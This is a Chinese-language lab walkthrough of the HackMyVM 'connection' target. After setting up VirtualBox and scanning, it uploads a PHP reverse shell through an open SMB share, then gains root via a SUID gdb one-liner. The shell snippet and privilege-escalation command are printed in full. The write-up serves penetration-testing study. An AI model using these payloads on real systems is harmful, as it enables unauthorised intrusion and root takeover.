(没错,标题是错别字,是手记....)有读者想看打靶的文章,那就出个系列好啦
安装virtualbox
先虚拟机配置,麋鹿运行靶场的环境为centos7,先在vmware设置里里启用虚拟化
1.添加 VirtualBox 仓库
创建一个新的 repo 文件
sudo vim /etc/yum.repos.d/virtualbox.repo
写入以下内容
[VirtualBox]
name=Oracle Linux / RHEL / CentOS-7 / x86_64 - VirtualBox
baseurl=http://download.virtualbox.org/virtualbox/rpm/el/7/x86_64
enabled=1
gpgcheck=1
gpgkey=https://www.virtualbox.org/download/oracle_vbox.asc
2.安装依赖项:
sudo yum install -y gcc make perl kernel-devel kernel-headers dkms
3.安装VirtualBox
sudo yum install -y VirtualBox-5.2
3.重建内核模块
sudo /sbin/vboxconfig
4.验证安装
VirtualBox --version
下载今日靶场
导入VirtualBox并运行
配置网络
如下图,centos和kali选nat
靶机选桥接,接口选以太网接口,也就是物理网络接口。
桥接和nat的区别之前文章提到过,不懂的去看一下那张图
信息收集
先扫网段
然后端口
有ssh,http,smb
先看一下web页面,默认页面
扫目录
没有东西,端口扫描发现445开放,那就去看看smb
smbmap -H 192.168.131.138
有一个共享文件夹,尝试连接一下,这个目录看起来像之前的默认页面目录
下载看一下文件内容
就是刚才的那个默认页面,此目录应该就是web目录了
好了,现在直接尝试构造上传一个反弹shell的马子到靶机,然后访问
$ip = '192.168.131.134';
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
弹回来了
提权
有备份
本想着看看能不能爆破,结果没有下载权限
那就试一下suid提权,先看一下suid信息
find / -user root -perm -4000 -print 2>/dev/null
有gdb,那一会可以试一下相应的payload,这里先解释一下suid的提权原理
首先说一下suid提权,简单来理解就是这些可执行文件会以文件的所有者的权限来执行这个可执行文件,如果他们的所有者是root,那就是以root权限执行,比如有个文件以你当前的权限看不到,然后发现suid中有个cat,那你就可以用cat去查看了,小白难理解就想这就像“尚方宝剑”一样,用它就如同root亲临。
而我们用其中存在的一些命令去尝试构造一个长时间的高权shell就达到了提权的目的了。
再说回gdb提权,首先什么是gdb,官方来说gdb是GNU开源组织发布的一个强大的Unix/Linux下的程序调试工具,通过shell操作,可以实现各类IDE类似的调试功能。
但我们在此处只要记住它的一个功能就是,gbd可以启动程序,让程序员可以自定义地运行程序。那我们就可以用它调用python,弹个shell回来,结合suid,这个回来的shell就是root权限了。
具体如下:GNU调试器(GDB)允许执行自定义的Python脚本,也就是可以支持编译自定义gdb
gdb -nx -ex 'python import os; os.execl("/bin/sh","sh","-p")' -ex quit
读flag
结束,这个靶场很简单,思路就是smb上传webshell,然后gdb提权
★
原文始发于微信公众号(渗透安全团队):靶场 | SMB上传hackmyvm connection知识点
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论